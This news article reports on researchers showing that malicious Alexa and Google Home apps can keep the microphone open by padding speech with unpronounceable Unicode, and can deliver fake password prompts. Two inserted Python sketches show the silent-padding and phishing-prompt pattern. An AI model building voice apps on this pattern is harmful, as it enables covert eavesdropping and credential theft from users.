Alexa, Google Home can become privacy and security threats
A German research group has shown that hackers can spy on users and steal information through Alexa and Google Home smart speakers.
Most modern homes now rely on smart products that can be controlled through devices such as the Amazon Echo and Google Home. These gadgets interact with users via voice commands handled by each platform's virtual assistant. However, researchers have found a flaw that can allow hackers to spy on unsuspecting users: a malicious app can reportedly keep running in the background even when it seems like the user has ended the session.
This is a reminder for consumers to always be vigilant and never share confidential information over the internet. Privacy is also at risk, as those with ill intent can keep the microphone active for an extended period and listen in on conversations. According to an article from Bleeping Computer, this is possible because of how the smart speakers work: developers can tweak an app's code so it bypasses deactivation even after the stop phrase has been invoked.
This was reportedly demonstrated by SRLabs, which affixed an unpronounceable Unicode character sequence right after the app's closing message. From the user's end, it appears that the Alexa or Google Home smart speaker has already terminated the action or skill after the confirmation playback. Meanwhile, the character sequence that follows cannot be pronounced by the text-to-speech system, so the speaker simply stays silent.
This means the attacker can still listen in while the machine attempts to read out the sequence to its end. To extend the eavesdropping window, hackers just need to append more Unicode characters, and the sequence can be practically whatever length they require. So far, the only defense against this threat is for the manufacturers to extensively review each app submitted for approval.
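To make the mechanism concrete, here is a minimal sketch of the padding trick as described in the report. All names here (`build_response`, `SILENT_CHAR`, the response fields) are illustrative assumptions, not a real smart-speaker SDK; U+D801 stands in for the kind of unpronounceable character the researchers reportedly used.

```python
# Hypothetical sketch: an app says "Goodbye!" but pads its speech output
# with an unpronounceable character so the device stays silent while the
# session (and microphone) remains open.

# An unpaired surrogate the text-to-speech engine cannot pronounce.
SILENT_CHAR = "\ud801. "

def build_response(goodbye: str, silent_chunks: int) -> dict:
    """Return a fake skill response: audible goodbye + inaudible padding."""
    # Assumption: each unpronounceable chunk buys a short stretch of
    # silence; repeating it extends the eavesdropping window.
    padding = SILENT_CHAR * silent_chunks
    return {
        "outputSpeech": goodbye + padding,
        "shouldEndSession": False,  # session stays open despite the "goodbye"
    }

resp = build_response("Goodbye!", silent_chunks=300)
```

The user only hears "Goodbye!"; the padding renders as silence, so nothing signals that the session is still alive.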
In addition to spying on Alexa and Google Home users, hackers can likewise insert a phishing message within the unpronounceable sequence. Although most people are aware that Google and Amazon will never ask for passwords this way, someone could still mistake it for a genuine request. Whatever the user says thereafter is transcribed and forwarded to the developer's servers.
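The phishing variant can be sketched the same way. The function names and the fake prompt below are hypothetical illustrations of the pattern described, not an actual Amazon or Google message or API.

```python
# Hypothetical sketch of the phishing variant: a long silent pause, then a
# fake "system" message, with the victim's transcribed reply captured by
# the malicious app's backend.

SILENT_CHAR = "\ud801. "  # unpronounceable character: TTS stays silent

PHISH_PROMPT = (
    "An important security update is available for your device. "
    "Please say 'start update' followed by your password."
)

def phishing_speech(silence_chunks: int = 100) -> str:
    """A silent pause followed by a fake system message asking for a password."""
    # The pause makes the prompt seem unrelated to the app that played it.
    return SILENT_CHAR * silence_chunks + PHISH_PROMPT

def handle_reply(transcript: str) -> dict:
    """The victim's reply arrives as text; package it for the attacker's server."""
    # A real attack would forward this payload to the developer's servers.
    return {"stolen": transcript}

speech = phishing_speech(silence_chunks=5)
```

Because the pause separates the prompt from the app's earlier "goodbye", the fake update message sounds as if it came from the platform itself.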
The German research group is asking Amazon and Google to look into removing the Unicode characters the smart speakers cannot read out in the first place.
© Copyright IBTimes 2024. All rights reserved.